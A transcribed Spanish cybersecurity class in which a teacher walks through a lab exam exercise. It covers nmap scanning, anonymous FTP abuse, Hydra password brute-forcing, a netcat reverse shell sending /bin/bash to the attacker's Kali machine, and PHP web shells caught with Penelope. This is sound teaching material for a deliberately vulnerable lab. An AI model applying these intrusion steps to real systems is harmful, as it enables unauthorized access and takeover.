La idea de la clase de hoy es resolver el ejercicio que os puse en el aula virtual, que básicamente es un ejercicio que nos vale para repasar los conceptos de bind shell, de reverse shell, de web shell y resolver la última parte práctica del examen de la evaluación y jugar con una web shell que se está utilizando en incidentes reales, que es la web shell alfa que os colgué en el aula virtual. Entonces, bueno, empezamos. Voy a resolverlo rápidamente, parándome a explicar en alguna cosa así, pues bueno, un poco relevante. Entonces empezamos. Yo ya tengo la máquina Kali y la máquina vulnerable arrancadas, y lo primero que me dicen es que haga un descubrimiento, que haga un barrido en la red de la máquina vulnerable para detectar su dirección IP. Vale, aquí lo que me están pidiendo es que descubra cuál es la dirección de la máquina en la red de máquinas vulnerables. En mi caso, la red de máquinas vulnerables están con IPs desde la 101 a la 254, y este sería el comando. Este comando, la opción "-sn", en algunas versiones antiguas también se acepta la "-sp" mayúscula, me parece que es. Esto lo que hace es una exploración a nivel de red local, o la red, que el rango que vosotros le ponéis ahí, para descubrir los equipos. Esto, como tenéis en la información del Nmap, esto lo hace si está en una red local enviando mensajes ARP. Si está en una red remota, lo hace enviando una secuencia de mensajes con la esperanza de recibir alguna respuesta. Envía mensajes ICMP correctos, envía mensajes ICMP de timestamp y envía un par de mensajes de tipo TCP al puerto 80 y creo que era el puerto 443. La idea es, hago 4 pruebas y si obtengo un mensaje de respuesta de alguna de ellas, entonces sé que la máquina está operativa. En mi caso, la máquina tiene la IP 158. Vale, si yo opto por un Nmap a secas, realmente no estoy haciendo un descubrimiento puro y duro. Lo que estoy haciendo es un descubrimiento a base de hacer un barrido de exploración. Vale, analizo pues los 1000 puertos por defecto. Entonces, bueno, no es en principio lo deseable. Aquí simplemente quiero descubrir qué máquinas están operativas. Entonces, esta sería pues la respuesta al primer apartado de este ejercicio, ¿vale? Que era, pues bueno, una de las preguntas del examen. Luego me dicen, detecta los puertos abiertos mediante análisis de todos los puertos TCP de la máquina vulnerable. La IP de la máquina vulnerable ya la hemos descubierto, es la 158. Para hacer un barrido de descubrimiento de puertos, yo lo que puedo hacer es un sudo nmap -n, no quiero que haga resoluciones DNS, ahora le pongo la opción -pn. Esto quiere decir que ya considere a la máquina 158, que le voy a especificar como que está operativa, que no haga ningún tipo de intento de descubrimiento. Luego -ss, y a continuación los puertos que quiero analizar. Análisis TCP, tenéis dos opciones. Una es la -ss y otra es la -st. ¿Cuál es la diferencia entre las dos? Bueno, esta la llamaban silenciosa porque se envía el primer mensaje de establecimiento de conexión y una vez que me responde la máquina víctima, yo ya aborto la conexión, yo ya no respondo. Si el puerto está cerrado, me envían un TCP reset y ahí se acabó la comunicación, pero si el puerto está abierto, a mi mensaje de establecimiento de conexión SYN me envían un SYN ACK y yo, en vez de continuar el establecimiento de la conexión como dicta el protocolo TCP, aborto ahí. ¿Vale? Esto dejaba conexiones medio abiertas. Teóricamente esto no se registra a nivel de aplicación, entonces no quedaba en los logs y por eso se llamaba silencioso. Bueno, a día de hoy los IDS, los detectores de intrusos que veis en incidentes, en el módulo de incidentes, sí son capaces de ver este tipo de cosas. Y luego tenemos la opción -st, que también es igualmente válida. Aquí con el -st lo que se consigue es descubrir el estado de los puertos y en caso de que el puerto esté abierto, sí hay ese establecimiento de conexión. El saludo a 3 vías TCP/D, mensaje SYN, hola, quiero hablar contigo. Si el puerto está abierto, me envían un SYN ACK y yo respondo siguiendo el protocolo con un ACK, se establece la tubería de datos y luego se cierra con los mensajes FIN correspondientes, ¿vale?
es más lento en el sentido de que se envían más mensajes. Bueno, a mí con esto me llega, y con esto rápidamente hago un análisis de los 65.536 puertos y llego a la conclusión de que hay dos abiertos, el 80 y el 21. Vale, pues esta sería la respuesta a la pregunta 2. Vale, yo voy copiando, pegando para luego reutilizar esta información. Luego, la pregunta 3 me decía, detecta versiones, scripts por defecto y sistema operativo en los puertos abiertos que, bueno, hemos detectado antes. Bueno, pues yo ya sé que hay dos aplicaciones corriendo en el puerto 21 y en el 80. ¿Cómo puedo detectar versiones, scripts por defecto que se ejecuten contra estos servicios? Bueno, pues ejecuto el nmap con opción "-sv" de detección de servicios, "-sc" ejecución de los scripts por defecto de nmap, "-o" para detección de sistema operativo, y me valdría con indicar estos dos puertos, que son los dos puertos abiertos que detecté antes. A mayores, si alguien quería, podía añadir un puerto que estuviese cerrado para facilitar la detección del sistema operativo y poner la dirección IP de la máquina víctima, y al cabo de unos segundos pues me va a salir el resultado diciendo que efectivamente el puerto 21 es un puerto abierto donde escucho un servidor FTP, que además va a permitir el acceso anónimo. Puerto 21, FTP, me indica el software que corre, un ProFTPD, me dice también por el script por defecto que he ejecutado en nmap para saber si el servidor es un FTP anónimo, me dice que sí, que es un servidor FTP anónimo, y además me descubre que hay dos ficheritos por ahí. Y el puerto 80, que yo sabía que estaba abierto, me confirman que está abierto, que además corre un servidor Apache 2454 Debian. Esto está sacado por el banner, con lo cual probablemente esta máquina está corriendo un servidor bajo un sistema operativo Linux Debian. Y en la detección del sistema operativo no consigue determinar exactamente cuál es, pero me dice que es probable que sea un sistema Linux con un kernel entre la versión 4 y la 5. Unido al banner del Apache, pues bueno, puedo intuir que esto es un servidor Linux Debian. Bueno, pues esta sería la respuesta a esta pregunta. Luego me dicen FTP anónimo, comprobación del acceso anónimo, subida de ficheros, descarga de ficheros. Bueno, pues para comprobar que efectivamente nos encontramos ante un servidor FTP anónimo, eso se puede hacer simplemente accediendo con un cliente FTP al servidor remoto, usuario Anonymous, que es el convenio para acceder de forma anónima a los FTP, contraseña. En un FTP anónimo valdría cualquier contraseña, originalmente había que meter tu dirección de correo electrónico, pero vale cualquier cosa. Y una vez que estáis dentro de un servidor FTP, lo que deberíais hacer es, primero, ¿qué hay visible? Pues aquí veo dos ficheros, privacy e index.html. Luego, ¿puedo descargarme ficheros? Pues get privacy, me lo puedo descargar. ¿Puedo subir ficheros? Bueno, pues aquí yo lo que voy a hacer es, tengo aquí un ficherito hola.txt en mi máquina local, voy a probar a ver si puedo subirlo. Para subir ficheros es un put, pues put hola.txt, que es un fichero que tengo yo local en mi máquina, y lo consigo subir. Entonces en este momento sé que tengo un servicio FTP que permite el acceso como usuario anónimo, que puedo descargarme ficheros y que puedo subir ficheros. ¿Qué más cosas habría que comprobar en un FTP? ¿Dónde estoy? Aquí me dice que estoy en el directorio raíz, es decir, estás en la parte de arriba de la jerarquía de ficheros de este servidor, pero compruebo de todas formas si estoy enjaulado, si me han metido en un chroot. Por ejemplo, quiero hacer un cd a /home. Estoy tratando de escaparme de la jaula del FTP y moverme a otra carpeta que sé que hay en el sistema operativo Linux. Y no me deja. Intento hacer un cd .. para subir en la estructura de ficheros y no me deja. Y esto pues conectó solo. Bueno, no me deja.
Bueno, aquí me dice que sí, pero cuando hago un pwd vuelve a estar en la raíz, ¿de acuerdo? Bien. Bueno, es el pendrive que se conecta y se desconecta solo. Vale. Para no andar molestando, lo voy a desconectar y así no nos molesta. Vale. Seguimos. Pues esta sería, bueno, estos comandos que estuve escribiendo por aquí, pues sería lo que yo tendría que copiar, pegar en el enunciado de la tarea. Vale, con esto ya podría deducir, pues eso, que tengo acceso anónimo, que puedo subir ficheros, descargar ficheros, y esto es muy importante para otras preguntas que vienen a continuación. Ahora me preguntaban detección de los métodos HTTP habilitados en la máquina vulnerable mediante scripts de Nmap. Bueno, pues yo aquí, esto ya lo puedo dejar, sé que hay scripts de Nmap que me permiten descubrir los métodos habilitados HTTP en un servidor web. Bueno, si no me sé de memoria el nombre, yo lo único que tengo que hacer es hacer un listado de los scripts de Nmap y la salida, pues filtrarla para no tragarme tantas líneas, por ejemplo con un grep HTTP, y aquí ya puedo buscar los métodos. Es más, incluso podría hacer grep http /grep method para ver líneas filtradas, y aquí me encuentro pues que hay un http methods, ¿no? De métodos. Bueno, pues con esto ya estaría. Simplemente tendría que hacer sudo nmap. Vale, no quiero hacer comprobaciones de que la máquina está operativa porque ya sé que está operativa. Menos script, aquí el nombre del script, puerto 80 y la dirección de la máquina, y con esto me dice que los métodos habilitados en esa máquina pues serían el get, el post, el option y el head, es decir, los normales. Tenéis una máquina resuelta donde sí había un método peligroso que era el método put, y yo creo que era el método move. Claro, es súper peligroso porque con el método put tú puedes subir ficheros al servidor web remoto, y con el método move tú lo que hacías era moverlos, con lo cual te saltabas alguna limitación que tenía de control de acceso al servidor web y subías al final código que podías ejecutar en el servidor remoto. A continuación me dice que haga un fuzzing de directorios utilizando esta lista, de esta word list que pertenece a seglist. Vale, lo primero, ¿dónde está esta lista? Pues como todo lo importante en Kali, en /usr/share, aquí ya tengo seglist en la sección de discovery, web content, y por ahí tenéis un montón de ficheros, y en concreto el que os pedían era este de aquí. Vale, entonces yo esto me lo puedo copiar. Bueno, voy a hacer un copy de la ruta, copy usr, se puede hacer la llamada directamente a ese fichero, ¿vale? Yo lo hago de esta manera y lo voy a guardar pues como, bueno, con el mismo nombre. ¿Por qué lo copio a mi carpeta personal? Porque cuando ejecute el comando el ffuzz, en vez de poner la ruta a este fichero, que es todo esto tan largo, pues simplemente lo llamo por el nombre, porque ya está en el directorio donde estoy. Se podía poner la ruta completa y también va a funcionar. Bueno, ¿qué problema tiene este fichero? Que se llamaba dir, ¿no? Sí, dirbuster. Bueno, pues este fichero es simplemente una word list, una colección de palabras que yo voy a ir probando cuando haga el fuzzing de directorios, pero tiene como problemilla estas primeras líneas que tienen almohadillas. Y si utilizáis el fichero, la word list tal cual, ffuzz os va a sacar por pantalla algunos resultados que os van a ensuciar la presentación. Puedo actuar de dos maneras. La primera, editar este fichero y borrar todas estas líneas de comentarios,
O la segunda, utilizar una opción que tiene FFUZ, que es de ignorar estas líneas que empiezan por almohadilla. Bueno, yo voy a hacer un FFUZ y el FFUZ lo de siempre. Pones la URL base en la que tú tomas de partida. Yo voy a hacer un FFUZ tomando como base la dirección IP de mi servidor web remoto. A continuación, donde yo quiero hacer el fuzzing, es decir, donde yo voy a probar todas y cada una de estas palabras de esta lista, pongo la palabra fuzz, F-U-Z-Z en mayúscula, ¿vale? Luego aquí pongo mi fichero de diccionario, que es este de aquí. A continuación pongo, como me pedían, que además de buscar directorios, busque ficheros .php, .txt y .html, lo pongo con la opción de extensiones, y luego pongo la opción "-ic" para ignorar los comentarios, es decir, estas líneas. Y en principio con esto ya estaría. Le doy a Enter y se pone a trabajar. Vale, aquí ¿qué me está haciendo mal? Un segundo. Bueno, déjame comprobar que es esta la web. Vale. Vale, ahora sí, ahora me estoy ignorando los comentarios y veis aquí, y aquí una cosa muy curiosa. Claro, en el examen es normal que uno no se dé cuenta, por eso estaba el ejercicio guiado, pero es algo bastante importante para la resolución, en este caso de esta máquina. Está adaptada de una de HackMyVM, y para el día de mañana cuando uno haga bueno, análisis de penetración. No sé si os fijasteis, os lo pinto por aquí, que cuando yo accedí por FTP me encontré con dos ficheros, un fichero index.html y un fichero que se llamaba privacy.txt, y que ahora cuando yo accedo por HTTP haciendo el fuzzing, me vuelvo a encontrar con dos ficheros, uno que se llama index y uno que se llama privacy.txt. Lo tengo por aquí. Bien, yo aquí puedo empezar a razonar y pensar dos situaciones. La primera, son archivos diferentes, pero que están en carpetas distintas. La carpeta donde yo aterrizo por FTP pues tiene dos ficheros, y la carpeta donde está el servidor web, lo que es el document root del servidor web, pues tiene dos ficheros que casualmente tienen el mismo nombre. Eso puede pasar, vosotros seguramente tengáis en vuestro equipo ficheros con el mismo nombre que están ubicados en carpetas distintas y todo funciona bien, no hay ningún problema. Esa es la primera posibilidad. Y la segunda posibilidad, que es más jugosa, es que sean los mismos. Es decir, son los mismos ficheros. Y claro, uno puede decir, ¿cómo es posible que yo acceda por FTP y por HTTP y acceda a los mismos ficheros? Bueno, pues la respuesta es bastante sencilla. Y los que habéis gestionado sitios web, pues seguramente esto os suene. Resulta que yo tengo una carpeta donde yo alojo los servidores web, perdón, las páginas web de mi servidor web, del Apache, del Nginx o lo que sea, lo que yo llamo un document root, es decir, una carpeta donde el servidor web va a buscar las páginas web que le piden los clientes. Entonces, todas las páginas web, todas las imágenes, todo lo que yo quiera servir vía web, lo tengo que meter en esta carpeta, y aquí habrá ficheritos, las que sean. Ahora, la pregunta del millón: ¿cómo yo desde mi casa, desde mi empresa, consigo subir mis páginas web
mis imágenes, mis documentos de texto, mis PDFs, a este document root del servidor Apache. Bien, pues una forma es mediante algún protocolo de transferencia de ficheros, que puede ser FTP. Yo tengo por un lado mi servidor Apache que lee una carpeta y sirve estas páginas web a los clientes, a los navegadores, y luego tengo otra aplicación que es un servidor FTP que me permite volcar directamente en esa carpeta las nuevas versiones de las páginas web que quiero servir a mis clientes. Entonces es muy habitual esto. Quien dice FTP dice SFTP, SCP, incluso compartición de archivos con SMB o lo que sea. Todo depende del entorno en el que estéis. Bueno, esto no lo pedía el enunciado del examen, pero yo lo voy a comprobar, ¿vale? Si recordáis, yo subí por FTP un ficherito que se llamaba hola.txt. Pues yo voy a buscar aquí hola.txt. Pues efectivamente, el fichero que yo subí por FTP me aparece aquí reflejado. Con lo cual llego a la conclusión que estoy en la situación número 2 que os decía antes. El document root del servidor web es accesible vía FTP para que el administrador de ese servidor pueda actualizar el sitio web con nuevas páginas. Bien, también había otra carpetilla por ahí, perdón, otra página que se llamaba Privacy. Bueno, pues esto también os decía que sacaseis por aquí unas fotos. Bueno, pues esto en el examen simplemente cogeríais el Flameshot o cualquier otro programa de captura de pantalla. Bueno, precisamente esta página no la quiero esta. Bien, pues esto lo guardaría con un nombre por aquí, web 01, y lo tendría que volcar pues aquí en el ejercicio. Por ejemplo. Vale. Ya tengo por aquí la imagen de pirata y también muy recomendable pues visitar la página de inicio, que es una página de Debian de toda la vida, del servidor web Debian, de Apache en Debian. Pues nada, guardaría esta imagen, web 02 por ejemplo, y esto pues lo podría incluir en mi documento, ¿vale? Incluso también muy recomendable ver la página, ver el código fuente, por si hubiese algo. Ya os digo que cuando veamos auditoría web, pues esto lo trabajaremos más, ¿vale? Y aquí en principio pues no hay tampoco nada del otro mundo, ¿vale? Hay algún comentario que hay por ahí que se podría investigar, pero parece que no hay nada. Lo más relevante de lo que hemos descubierto hasta ahora es eso, una carpeta en donde yo puedo subir cosas. ¿Qué más os proponía en el ejercicio? Manuel, Dime. Perdón, Sí, sí. una preguntita. Sí. Entonces, tú lo que estás diciendo es que el directorio al que accedes por FTP es el mismo directorio de HTTP. Sí. O sea, el raíz. El raíz del servidor web, donde el servidor web va a buscar los ficheros. Eso nunca hay. Es una configuración muy mala hecha aposta por la persona que diseñó la máquina. En el mundo real, ¿qué podría ocurrir? Claro, no vas a permitir un FTP anónimo para poder subir ficheros al servidor web Apache, ¿no? En el mundo real, tú lo que tendrás seguramente será una cuenta de usuario en esta máquina, usuario contraseña, y tú mediante FTP u otro protocolo de transferencia de ficheros puedes iniciar sesión en la máquina remota, te mueves a la carpeta del Apache donde tú tienes permisos de escritura y ahí subes tus ficheros, ¿vale? Si tú le consigues las credenciales a esa persona, vas a poder manipular su sitio web, ¿vale? De hecho lo vamos a ver ahora en unos minutos, y vamos a empezar a subir web shells. Vale, en el examen, en este ejercicio así medio de repaso, refresco, os proponía hacer un ataque de fuerza bruta al usuario descubierto en la numeración HTTP. Bueno, en la numeración HTTP ya vimos que en Privacy me aparecía este nombre, pirata, ¿vale? Este era el nombre de usuario.
quiero hacer un ataque de fuerza bruta. Bueno, pues ya tengo un usuario que sería pirata. Aquí ya imaginación al poder. Podéis utilizar Hydra, podéis utilizar Medusa, o incluso otras que habría en el Kali Linux, ¿no? Patato o alguna otra por ahí. Bueno, yo voy a utilizar Hydra, -L minúscula, usuario pirata. Aquí le digo la ruta del diccionario, yo ya lo tengo descomprimido. El diccionario Rocky está donde siempre, donde están las cosas, en Kali, ¿no? En USR, Share, en este caso WordList, y por ahí está el Rockju, .txt.gz. Esto recordar que habría que descomprimirlo, ¿vale? Habría que poner, bueno, la ruta, ejecutarlo como root, porque yo no soy administrador aquí, y tendría simplemente que hacer esto para descomprimir ese fichero, ¿vale? Si le dais aquí, no tengo permisos, pero si lo hago con sudo y no me hace quedar mal, ya lo tendría descomprimido, ¿vale? Yo lo tengo ya copiado en mi carpeta personal, con lo cual en vez de poner la ruta a esa USR share WordList, ya pongo la ruta a mi copia de Rockju, ¿no? Luego, esto también por funcionalidad especial que a mí me gusta de Hydra, que no se pedía, pero yo normalmente si lo pongo -e nsr, es decir, a mayores de las palabras que aparecen en el diccionario Rockju vas a probar 3 combinaciones. Una, la contraseña en blanco, es decir, usuario pirata, contraseña en blanco. Otra, el propio nombre del usuario pirata, contraseña pirata. Y otro, el nombre del usuario invertido, usuario pirata, contraseña, pues ata-rip, es decir, pirata invertido, ¿no? Luego también os decía que hicieseis el ataque con 3 hilos de conexión en paralelo, y yo lo que tengo es un servicio FTP en la IP 158, y la opción "-v" es para que me muestre los intentos. Esto era opcional. Si yo no pongo el "-v", Hydra se pone a probar contraseñas y solamente me muestra los aciertos. Le doy aquí. ¿No veis? Esto es lo que os decía: contraseña pirata, contraseña en blanco, y aquí contraseña el pirata invertido. El intento es muy cortito porque aparecen las primeras contraseñas, ¿vale? Está entre las 25 primeras. Y aquí ya tengo usuario pirata, contraseña monkey. Bueno, pues esto sería la parte de ataque de fuerza bruta. Una vez que ya tengo el usuario pirata y la contraseña asociada, pues puedo probar el acceso. Quiero acceder al equipo 158 siendo el usuario pirata y la contraseña monkey. Y efectivamente, aquí estoy, ¿vale? Estoy encerrado, pero estoy encerrado en el directorio del pirata, seguramente, ¿vale? Esto ya es una carpeta de usuario. Bueno, entonces pues esta ya tendría, además del acceso por FTP anónimo, un acceso como usuario pirata. Puedo acceder por FTP o incluso lo puedo comprobar accediendo directamente por la ventana. Soy el usuario pirata y la contraseña es monkey, y ahí ya entraría, ¿vale? Además, este usuario es especial porque es un usuario que es root en el sistema. Pero bueno, aquí nada, simplemente lo que os pedía era esto, que siguieseis a entrar por FTP con esas credenciales, más que nada para que comprobaseis que esas credenciales funcionaban, ¿vale? Bien, ahora, cosa interesante, me dice que una vez dentro de la máquina vulnerable, que lances una reverse shell hacia tu máquina Kali, que debe recibirse en el puerto 5555. Bien, la reverse shell, muy claro el concepto. El atacante se pone a la escucha. El atacante está en la máquina Kali, pues sería un netcat, en cat o nc, el que vosotros queráis, -lnvp, y aquí el puerto, que en mi caso me dicen el 5555. Vale, fallos que vi por ahí alguna gente durante el examen. Ojo con las opciones de netcat, o da igual, nc o encat, ¿vale? Yo lo hago con este, que es algo más nuevo. La opción -p está pensado para
puerto a la escucha. A ver, que yo creo que, no sé si es en este entonces, que sale más claro incluso. Porque hay alguno, aquí se ve muy bien. Fijaros, aquí en el man DNC, y me pone ejemplos de uso, y aquí en las primeras líneas ya lo podéis ver. Cuando yo quiero poner netcat a la escucha, me da igual NC, netcat o encat, es lo mismo. Cuando yo lo quiero poner a la escucha, sí es válida la opción "-p". Yo me pongo en modo listen, en modo escucha, en el "-p", en el puerto que yo indico, que es lo que yo puse. "-L-P", con eso me llega, "-L-P". Me pongo a la escucha en el puerto 5555. Lo del "-N" y el V es para que no haya resolución DNS y para que sea modo verbose, que me diga con mensajitos lo que está pasando en la conexión. Entonces yo con netcat en modo escucha, en la máquina atacante ya he hecho la primera parte, me quedo a la escucha. Y ahora lo que tengo que conseguir es desde la máquina víctima lanzar la reverse shell. Bueno, nosotros ya tenemos un usuario y vimos que podemos iniciar una sesión en la máquina. Yo soy el usuario pirata y contraseña monkey. Bueno, pues ahora yo puedo hacer un netcat a la IP de la máquina Kali. Aquí la tengo que descubrir, ADDR. Mi máquina Kali tiene la IP 5699. Entonces, bueno, pues es simplemente venir aquí, decir, vale, pues quiero hacer un netcat a la IP 56.99, puerto 5555, que es donde está el atacante a la espera, y ahora viene la magia, "-E", y el comando que yo quiero enviar por esa línea de comunicaciones, que en mi caso es una terminal, un /bin/bash o /bin/sh o /bin dash o el zshell, la línea de comandos que vosotros queráis. Y ya lo tengo todo. ¿Por qué es una reverse shell? Porque la máquina atacante se queda a la escucha y la máquina víctima es la que inicia la conexión. El primer paquete de esta conexión es lanzado por la máquina víctima y lleva de regalo la terminal. Y aquí lo veo. Conexión desde el equipo 158, mi máquina víctima, y aquí ya puedo ejecutar, pues eso, Huamai. Y ¿dónde estoy? Estoy en la carpeta del usuario pirata y Huamai soy root. Bueno, realmente soy pirata, que pirata está mapeado como usuario root, ¿vale? Bueno, creo que os pedían ejecutar por aquí el comando IP, perdón, ID, no IP, comando ID, el IP -br addr, con esto confirmáis que estáis en la IP 158, y el comando hostname, que es la máquina friendly, y todo esto lo podéis confirmar pues también por esta línea de comandos, ¿vale? Bien, pues con esto estaría, es decir, simplemente habría que copiar pues esta parte de la parte del servidor, ¿vale? En la máquina Kali yo ejecuto el netcat en modo escucha, y en la máquina víctima pues tendría que poner la otra parte, ¿no? Del NC a la IP de la máquina Kali y regalando el /bin/bash, y esta parte pues ya estaría, ¿de acuerdo? Bueno, para no tener tantas cosas abiertas, pues voy a proceder, si localizo las máquinas algún día, pues aborto la conexión y aquí recupero la terminal en Kali. Luego me decían por aquí, como otra parte del ejercicio, que configure y suba una PHP web shell de tipo reverse shell, que la llame desde el navegador y que obtenga la reverse shell en la máquina Kali, en este caso en el puerto 6666, y recogiéndola mediante la aplicación Penélope. Vale, pues también, muy sencillo. Aquí lo que tengo que hacer primero, que no sé si lo tengo ya instalado aquí, es Penélope. No la tengo por aquí, bueno, pues la tengo que conseguir. Esto ya lo teníais en la máquina Kali del examen, y si recordáis, Penélope
es una utilidad que ya lo pone aquí, es un shell handler, es decir, es una utilidad para la gestión de, en este caso, reverse shells, ¿vale? Bueno, me puedo bajar el punto .pi, o yo lo que suelo hacer aquí es hago un git clone, clono el proyecto, y esto lo que va a hacer es me crea una carpeta que se llama Penélope, y lo único que tengo que hacer es fijarme que tengo por aquí el ejecutable de Penélope, este de aquí, y llamo a Penélope, y me estaban pidiendo que pusiese a Penélope a trabajar en el puerto 6666. Bueno, pues nada, simplemente Penélope -P6666, y aquí ya veis que estoy a la espera de que me lleguen reverse shells al puerto 6666 en cualquiera de las direcciones IP que tenga esta máquina Kali. Entonces, bien, la primera parte ya la tengo hecha, la parte de poner Penélope a la escucha. La otra parte de personalización de la web shell, bueno, pues yo vuelvo aquí a la máquina Kali, digo, ¿dónde están las web shells? Pues donde siempre, USR, share, y aquí tengo web shells. Si recordáis, la definición de una web shell es, os la pongo por aquí y os lo explico en un minutillo, refresco ideas. Una web shell es simplemente un fichero que tiene instrucciones en un lenguaje de programación que entiende mi servidor web víctima. Si mi servidor web víctima trabaja con PHP, mi web shell va a tener que tener comandos PHP, ¿vale? Instrucciones en PHP. Si mi servidor web víctima corre ASP, tiene que ser ASP, JSP, exactamente igual. Entonces, simplemente una web shell es un fichero con un lenguaje de programación que el servidor web entiende, que yo me he buscado la vida para subir ese fichero al document root, a la carpeta donde están los ficheros que sirve el servidor web. ¿Cómo puedo subir una web shell? Bueno, pues 4 métodos principales. El primer método, utilizando protocolos de transferencia de ficheros. En el ejemplo nuestro, el FTP, hay mediante FTP la posibilidad de subir ficheros a la carpeta desde donde sirve el servidor web, las páginas web. Bien, pues yo abuso de un FTP anónimo mal configurado o de unas credenciales que he robado y suplanto la identidad de un usuario legítimo y subo ficheros. FTP, SCP, SFTP, es decir, FTP seguro, que va cifrado, SMB, lo que sea. Otra forma, las aplicaciones web que están corriendo en el servidor y tienen vulnerabilidades. Por ejemplo, formularios que permiten la subida de ficheros y no están suficientemente bien programados y permiten la subida de código. En este caso, en mi ejemplo, en PHP. También puede haber aplicaciones que son vulnerables a la inyección de comandos. Es decir, yo le puedo inyectar en una petición web al servidor que ejecute un comando. Y quien dice el comando whoami, dice el comando wget http una dirección de un servidor web que tengo bajo mi control / mi fichero malicioso. Y esa inyección de comandos hace que el servidor web víctima se conecte a mi servidor web remoto y se descarga el fichero que yo quiero. Otra forma, mediante métodos HTTP peligrosos, como puede ser el método put. Tenéis un ejercicio, un ejemplo de máquina vulnerable que tenía habilitado el método put, que permite la subida de ficheros. Y también otra forma de subir web shells es que tú de alguna manera hayas conseguido acceder al sistema víctima mediante algún usuario. ¿Vale? Eres un usuario dentro del sistema y te encuentras que ese sistema está ejecutando un servidor web y tienes permiso para acceder a su document root y copiar ahí ficheros. Esa sería la cuarta forma. Bueno, sea como sea, una vez subido ese fichero con código que el servidor web entiende, lo único que tiene que hacer el atacante es solicitar al servidor web que le sirva esa página web. ¿Qué va a ocurrir? Que el servidor web va a hacer su trabajo. Va a buscar este fichero, va a la carpeta donde tiene los ficheros, encuentra el fichero y lo ejecuta.
hemos conseguido lo que se conoce como RCE, ejecución remota de comandos o ejecución remota de código. Yo, desde un equipo lejano, consigo que el servidor ejecute mis instrucciones. Bueno, aquí comentar, esto tiene ya más que ver con temas de incidentes y forense, que cuando uno se encuentra en un servidor web una web shell, la web shell en sí misma no puede atacar nada, es la consecuencia de un ataque previo, de una vulnerabilidad, cualquiera de estas, que ha sido explotada previamente. Y el atacante ha metido la web shell como mecanismo de persistencia, como mecanismo de posexplotación, para continuar explotando el sistema. Bueno, de web shells yo las clasifico en tres grandes tipos. Una que sería equivalente a una bind shell, es decir, yo subo mi fichero, mi web shell, y esa web shell está preparada para que yo le pase instrucciones, por ejemplo comandos, a través de un parámetro, y los ejecuta en el sistema operativo y me devuelve el resultado en el navegador, en el cliente web. Esta la tenéis en Kali Linux, es la Simple PHP Backdoor, me parece que se llama, y lo único que tengo que hacer es subirla a la máquina remota y mediante el comando, mediante el parámetro cmd, le paso el comando a ejecutar. Es equivalente a una bind shell, ¿vale? Yo pongo el comando, lo mando allí y se ejecuta y me devuelve el resultado. Hay web shells más elaboradas, como la que vamos a ver al final de la clase, que es la alfa, que se utilizó en incidentes reales, que vienen con gestores de ficheros, con gestores de base de datos, con la posibilidad de subir ficheros, de descargar ficheros, de borrar ficheros, de crear ficheros, de ejecutar comandos en el sistema operativo, con la posibilidad incluso de crear portales falsos de autenticación para robar credenciales, de hacer volcados de bases de datos, de lanzar reverse shells, etcétera, etcétera, ¿vale? Luego tenemos, que es la que pedía en el ejercicio del examen y en este ejercicio, web shells de tipo reverse shell, que básicamente viene a ser una reverse shell de toda la vida, pero en vez de Netcat, el que lanza la reverse shell, pues es una página web. El funcionamiento es muy sencillo. Yo consigo subir ese fichero con código al servidor web, ese fichero lo tengo que personalizar, y ese es el punto en el que nos quedamos en la resolución del ejercicio. ¿Y cómo lo personalizo? Con la dirección IP y el puerto donde la máquina del atacante se va a poner a la escucha. En esta diapositiva es un Netcat el que está a la escucha, nosotros lo vamos a hacer con Penélope. Una vez que yo personalizo la reverse shell, la subo al servidor web, pongo el Netcat a la escucha y solicito al servidor web que quiero ver esta página web, y el servidor web la va a buscar, va a leer el código, entiende ese código, ejecuta el código y el resultado es que se me devuelve una línea de comandos, una reverse shell, una línea de comandos interactiva, donde yo puedo interactuar, puedo ejecutar comandos y veo la salida. Es una línea de comandos muy básica que habría que estabilizar, como vimos en clase, ¿no? Con el método de Python o el método de script. Yo puedo llevarla a segundo plano, hacer el STTI RAW menos eco, todas estas historias. Esa estabilización nosotros ya la vamos a conseguir directamente con Penélope, pero el funcionamiento es el mismo. Web shell de tipo inverso, de tipo conexión inversa personalizada con los datos de mi máquina atacante, la subo al servidor. En la máquina atacante un programa que va a recibir esa línea de comandos, solicitud al servidor y pumba, conexión. Y como curiosidad, que lo tenéis también en los apuntes, en el vídeo ese de la charla de Dana Consolidario, que hablaba sobre web shells, hay web shells de tipo pivoting, es un uso muy específico. Tengo un atacante que quiere acceder a la red interna y no puede por las reglas de seguridad de los cortafuegos, pero este atacante sí tiene conexión con este servidor y este servidor sí tiene conexión con esta red interna. Entonces, en este tipo de situaciones, si el atacante consigue hacerse con el control de la máquina server 01, que podría ser un servidor web, podría subir una web shell de tipo pivoting, de forma que cuando él solicite visitar esta página web, realmente lo que está haciendo es hacer un salto hacia la red interna de la organización, abusando de las conexiones autorizadas internamente en la empresa. Vale, bueno, nosotros nos quedamos con
con el tipo reverse shell, y es lo que vamos a hacer, vamos a personalizar. Tipos diferentes de lenguajes de programación. Sí, dime. ¿Puedo hacer una preguntilla? Sí, dime. Si por ejemplo fuera, como has dicho, en la zona de meseta, el servidor web, sí, en la configuración del firewall más interno, ¿para qué va a comunicarse? O sea, ¿para qué va a abrir una comunicación sí. del server a la red interna? Pues bien, bien configurado no debería tener ninguna. Es lo que se llama, bueno, yo lo llamo un pinhole, un agujero, ¿no? En el firewall. La teoría lo pinta muy bonito y te dice que esto nunca se debería permitir porque tienes una máquina con un nivel de seguridad muy concreto, que es un servidor web expuesto a internet, y tienes aquí otras máquinas con un nivel de seguridad completamente distinto, que son máquinas que no son accesibles desde internet. No debería haber comunicación entre ellas, para eso pones un firewall en medio. Pero luego en el día a día de las organizaciones, pues a lo mejor resulta que hay aquí un proceso en el que hago una copia de seguridad de la base de datos o del document root o lo que sea a las 11 de la noche, y esa copia de seguridad que me genera automáticamente un script me la copio pues a este servidor de ficheros interno. No sé si ves la idea. Es decir, de decir, la teoría es muy bonita, luego te encuentras el mundo real donde, pues bueno, vas haciendo excepciones, y esas excepciones pueden provocar agujeros en el cortafuegos de los que luego un atacante se puede llegar a aprovechar. Una cosa tan sencilla como eso: roto los logs del servidor web y mediante un SCP y autenticación por claves sin contraseñas hago la copia a un servidor de archivos en la máquina interna. Simplemente, pues has abierto un agujero que no deberías haberlo abierto. ¿Vale? Eso se te debería plantear pues de otra manera, pues que la copia de seguridad, la rotación, se hiciese automáticamente aquí y que fuese el servidor interno el que iniciase la conexión, con lo cual el firewall, esta conexión desde aquí dentro iniciada hacia la red interna, ya no la permitiría. Pero bueno, es muy habitual en las empresas que se empiecen a hacer, pues eso, como agujeritos en la... A ver, el ejemplo que pongo yo un poco de andar por casa, tú piensas en una muralla, época medieval o incluso posterior, y dices, cuando construyes la muralla, dices, está genial, 